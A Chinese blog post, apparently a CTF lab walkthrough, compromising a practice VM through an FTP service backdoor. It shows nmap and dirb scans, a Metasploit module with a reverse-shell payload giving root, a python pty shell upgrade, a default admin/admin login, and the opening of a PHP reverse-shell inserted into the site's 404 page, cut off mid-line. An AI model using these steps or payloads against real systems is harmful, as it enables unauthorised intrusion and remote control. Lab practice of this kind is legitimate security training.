CTF靶机实战-FTP服务后门

靶场:
和彩云 提取码:hEKo

攻击机:192.168.106.131

1.进行目标主机探测 nmap 192.168.106.1/24
在这里插入图片描述

2.nmap -sV -v -T4 192.168.106.129 扫描目标服务版本详细信息

在这里插入图片描述

2.使用searchsploit [服务版本] 查看有没有可利用的漏洞

在这里插入图片描述

发现了两个利用信息,接下来为了省事(太菜了)使用metssploit进行利用

在这里插入图片描述
这里使用4号建立后门模块

  1. use 4
  2. show payloads 查看可用payload
  3. set payload 3 cmd/unix/reverse 设置反弹shellpayload
  4. show options 查看需要设置的信息,并填写
  5. run 执行远程溢出命令

成功拿到目标shell,而且还是root权限的😁
在这里插入图片描述

使用
python -c "import pty;pty.spawn('/bin/bash')"
优化shell
在这里插入图片描述
3.接下来进入root目录下拿到flag就ok啦

a.回想一下,进行目标端口扫描时发现目标还开启了80端口,那么😁

在这里插入图片描述
b.使用dirb http://192.168.106.129 对目标进行目录扫描
发现管理登入界面
在这里插入图片描述

在这里插入图片描述

c.进行简单尝试后发现 admin admin 居然进了😁

在这里插入图片描述
c.在目标404界面插入反弹shell代码

在这里插入图片描述

/*<?php /**/ error_reporting(0); $ip = '192.168.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值